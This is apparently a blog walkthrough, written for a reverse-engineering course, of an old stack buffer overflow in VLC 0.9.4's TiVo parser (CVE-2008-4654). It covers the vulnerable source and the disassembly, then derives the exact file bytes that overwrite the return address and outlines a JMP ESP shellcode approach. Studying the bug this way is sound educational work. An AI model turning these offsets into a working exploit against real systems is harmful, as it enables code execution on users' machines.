The following analysis details a stack buffer-overflow in VLC version <=0.9.4. The source (for those who want to follow along) is available on my Github here.

* Following this analysis requires some understanding of Intel assembly and basic reverse engineering concepts.


This walkthrough is inspired by coursework from my Reverse Engineering and Vulnerability Analysis course at Johns Hopkins University. More information and credit for this vulnerability can be found on the NVD page for CVE-2008-4654

vlc

Analysis of Source Code

The vulnerable function (parse_master) lies in the ty.c file located in folder vlc/vlc-0.9.4_src/modules/demux/ty.c. The parse_master function is on line 1623 of the ty.c source file. The relevant vulnerable portion of that function is provided below…

static void parse_master(demux_t *p_demux)
{
    demux_sys_t *p_sys = p_demux->p_sys;
    uint8_t mst_buf[32];
    int i, i_map_size;
    int64_t i_save_pos = stream_Tell(p_demux->s);
    int64_t i_pts_secs;

    /* Note that the entries in the SEQ table in the stream may have
       different sizes depending on the bits per entry.  We store them
       all in the same size structure, so we have to parse them out one
       by one.  If we had a dynamic structure, we could simply read the
       entire table directly from the stream into memory in place. */

    /* clear the SEQ table */
    free(p_sys->seq_table);

    /* parse header info */
    stream_Read(p_demux->s, mst_buf, 32);
    i_map_size = U32_AT(&mst_buf[20]);  /* size of bitmask, in bytes */
    p_sys->i_bits_per_seq_entry = i_map_size * 8;
    i = U32_AT(&mst_buf[28]);   /* size of SEQ table, in bytes */
    p_sys->i_seq_table_size = i / (8 + i_map_size);

    /* parse all the entries */
    p_sys->seq_table = malloc(p_sys->i_seq_table_size * sizeof(ty_seq_table_t));
    for (i=0; i<p_sys->i_seq_table_size; i++) {
        stream_Read(p_demux->s, mst_buf, 8 + i_map_size);
        p_sys->seq_table[i].l_timestamp = U64_AT(&mst_buf[0]);
        if (i_map_size > 8) {
            msg_Err(p_demux, "Unsupported SEQ bitmap size in master chunk");
            memset(p_sys->seq_table[i].chunk_bitmask, i_map_size, 0);
        } else {
            memcpy(p_sys->seq_table[i].chunk_bitmask, &mst_buf[8], i_map_size);
        }
    }

* The .dll which contains the compiled vulnerable source is in /vlc/vlc-0.9.4/plugins/libty_plugin.dll. Load this into IDA or an equivalent disassembler and you can peek into the assembly code as well.

Starting with the source, we see two variables, mst_buf, declared as an array of 32 uint8_t (8-bit/1-byte unsigned) integers and i_map_size which is declared as a signed integer (32-bits).

uint8_t mst_buf[32];
int i, i_map_size;

Further in, we see the first of two stream_Read function calls. This first call reads 32 bytes into the initialized mst_buf array. What’s important to note here, is this stream_Read takes data from a user-supplied source (namely, the chosen video file) and stuffs it into the buffer.

stream_Read(p_demux->s, mst_buf, 32);

Provided, is an example video file, video.ty+ (which is a short Tivo video file), which can be used as input. The parse_master function is called from the conditional displayed below (also located in same the ty.c file). Essentially, as VLC is processing the user input (video) file, if it encounters the 32-bit TIVO_PES_FILEID magic DWORD (which is 0xf5467abd) it will call parse_master with p_demux as the parameter. p_demux is the remaining bytes of the input file STARTING with the magic DWORD.

Conditional which calls parse_master function when TIVO_PES_FILEID bytes are encountered.

if( U32_AT( &p_peek[ 0 ] ) == TIVO_PES_FILEID )
    {
        /* parse master chunk */
        parse_master(p_demux);
        return get_chunk_header(p_demux);
    }

Definition of TIVO_PES_FILEID DWORD

#define TIVO_PES_FILEID   ( 0xf5467abd )

Moving down, we see the variable i_map_size initialized as U32_AT(&mst_buf[20]) which from the U32_AT inline function shown below will return a 4-byte integer (Endianness is Big-Endian) using the bytes starting at offset 20 of the mst_buf buffer. Given that we know mst_buf contains user-controlled data, we know now that i_map_size can be any arbitrary 4-byte integer.

static inline uint32_t U32_AT( const void * _p )
{
    const uint8_t * p = (const uint8_t *)_p;
    return ( ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16)
              | ((uint32_t)p[2] << 8) | p[3] );
}

In the second stream_Read call (located in the for loop) we see that 8 + i_map_size bytes are read from the input buffer (the video file) into mst_buf. This should immediately throw the red flag as we know mst_buf is only 32 8-bit integers wide and i_map_size can be an arbitrarily large number (any signed 32-bit integer which can be as large as 2147483647/7FFFFFFFh) provided by the user.

for (i=0; i<p_sys->i_seq_table_size; i++) {
    stream_Read(p_demux->s, mst_buf, 8 + i_map_size);

Using the provided video.ty+ file we can search (using a hex editor) for the magic bytes described earlier (f5 46 7a bd). One occurrence of this byte sequence is found at offset 0x00300000 in the video file. Moving to offset 20 (0x300014h in the file) from the start of the magic bytes we see a value of “00 00 00 02”. This means (based on this particular video input file sample) that i_map_size will be set to a value of 2.

Now that we see where we can affect the i_map_size variable and that the second stream_Read function can be used to overflow the mst_buf, let’s move to the disassembled code to get a better understanding of how many bytes are needed in order to overwrite the return address and take control of the instruction pointer.

Analysis of Disassembly

Once you’ve loaded libty_plugin.dll into IDA, you can search the available strings for the string “Unsupported SEQ bitmap size in master chunk” which we know resides in the parse_master function.

msg_Err(p_demux, "Unsupported SEQ bitmap size in master chunk");

This string is referenced somewhere in the middle (offset 0x61401CF8) of the parse_master function in the disassembled code.

.rdata:61409158 aUnsupportedSeq db 'Unsupported SEQ bitmap size in master chunk',0
.rdata:61409158                                         ; DATA XREF: sub_61401AE0+218↑o

Once in the parse_master function we can identify the first stream_Read call (at offset 0x61401C1F) and analyze the arguments being set up for the function call (shown below). Of note, is the lea instruction which dereferences memory at [esp+0FCh+var_3C] into edx (which is then passed into stream_Read as the pointer to the mst_buf array buffer). When converted, 0FCh+var_3C is equal to C0h. With this information, we know that the mst_buf array exists on the stack at esp+C0h and goes to esp+E0h (since we know the array is 32/20h bytes wide).

...
.text:61401C05                 mov     ecx, 20h ;move 32 into ecx
.text:61401C0A                 lea     edx, [esp+0FCh+var_3C] ; pointer to mst_buf array at ESP+C0
.text:61401C11                 mov     [esp+0FCh+var_F4], ecx ; 3rd param into stream_Read
.text:61401C15                 mov     [esp+0FCh+var_F8], edx ; 2nd param into stream_Read
.text:61401C19                 mov     edi, [eax+3Ch] ;pointer to p_demux input
.text:61401C1C                 mov     [esp+0FCh+Memory], edi ;input stream 1st param into stream_Read
.text:61401C1F                 call    stream_Read
...

Moving to the top of the function (at offset 0x61401AE0), we can examine the prologue (displayed below…)

.text:61401AE0                 push    ebp
.text:61401AE1                 xor     edx, edx
.text:61401AE3                 push    edi
.text:61401AE4                 xor     ebp, ebp
.text:61401AE6                 push    esi
.text:61401AE7                 xor     edi, edi
.text:61401AE9                 push    ebx
.text:61401AEA                 xor     esi, esi
.text:61401AEC                 sub     esp, 0ECh
.text:61401AEC                 sub     esp, 0ECh

As with any prologue, registers are being saved and room for local variables is being made on the stack. There are 4 pushes (registers being saved) and a sub instruction of ECh (room for local variables). Since we know mst_buf begins at esp+C0h and is 32 bytes in size we know that the end of this stack variable is at esp+E0h. Since ECh bytes were allocated for this function, we know that another 12 (Ch) bytes of stack space exist between the end of mst_buf and where EBX was pushed onto the stack. If you account for the 32 bytes of space taken by mst_buf on the stack, plus the 12 bytes of extra local variable space, plus the 4 saved registers (each 4 bytes wide) as well as the return address (4 bytes) which was put on the stack when parse_master was called, there are 64 total bytes that must be overwritten to overwrite the return address.

A (crude) representation of the relevant stack items is shown below…

Stack Representation

BytesData
…lower memory addresses…
32 Bytes  |  esp+C0h through esp+E0h which we know is mst_buf
12 Bytes  |  esp+E0h through esp+ECh which we know is the remaining local variable stack space
4 Bytes  |  push ebx moves DWORD value of EBX onto stack
4 Bytes  |  push esi moves DWORD value of ESI onto stack
4 Bytes  |  push edi moves DWORD value of EDI onto stack
4 Bytes  |  push ebp moves DWORD value of EBP onto stack
4 Bytes  |  Return Address saved onto stack when parse_master function is called
…higher memory addresses…


From this representation you can see that we need to write 64 (40h) bytes into mst_buf to overwrite the return address. Since we know from the source code that the second stream_Read reads in 8 + i_map_size bytes into mst_buf we know that we need to set i_map_size to 64 - 8 which is 38h.

stream_Read(p_demux->s, mst_buf, 8 + i_map_size);

Returning to our video.ty+ file - we can overwrite the byte offset we know corresponds to i_map_size with the byte values 00 00 00 38. Now, since the second stream_Read call occurs in a for loop, we want to ensure that it is only called once (so that additional data isn’t read into mst_buf). The for loop will execute i_seq_table_size amount of times and i_seq_table_size is set as i / (8 + i_map_size) which we can see from the source file.

p_sys->i_seq_table_size = i / (8 + i_map_size);

Since we have set i_map_size to 56(38h) we need to set i to a value which will result in i_seq_table_size being 1 (remember we want the for loop to only execute once). We can see from the source that i is set to the value U32_AT(&mst_buf[28]).

i = U32_AT(&mst_buf[28]);

So, moving 8 bytes further into the .ty+ file we can set the value that will ultimately be passed into i. From here, if we set mst_buf[28] equal to 40h (byte values 00 00 00 40) and mst_buf[20] byte values to 38h (00 00 00 38), we can have the for loop execute only once! Since 64 / (8 + 56) = 1.

Moving on, if we move to the 64h/4 (16th) DWORD starting at offset 0x00300020 of the video.ty file (remember, the first stream_Read call read in 32 bytes starting at the magic DWORD so we must start the second stream_Read at this offset) we see the byte values 00 00 03 20. We now know from all our previous analysis that if we overwrite this value (and play this file in VLC), it will overwrite the return function on the stack and when the return instruction is called at the end of the parse_master function, it will return execution to that address which we now control! A graphic of the relevant bytes is provided below…

Video.ty+ Bytes

Code Execution

With control over execution, we can do the usual steps for arbitrary code execution. Namely, generate shellcode, add it to the input file so that it is written onto the stack immediately after we overwrite the original return return address (as part of the mst_buf overflow), then use a memory address pointing to a JMP ESP instruction residing in libty_plugin.dll (or elsewhere we can find a JMP ESP in memory) as our new return address which will result in our shellcode being jumped to once the parse_master function returns.


Feel free to message me if something here wasn’t clear (I admit I am prone to writing confusingly long sentences) and thanks for reading!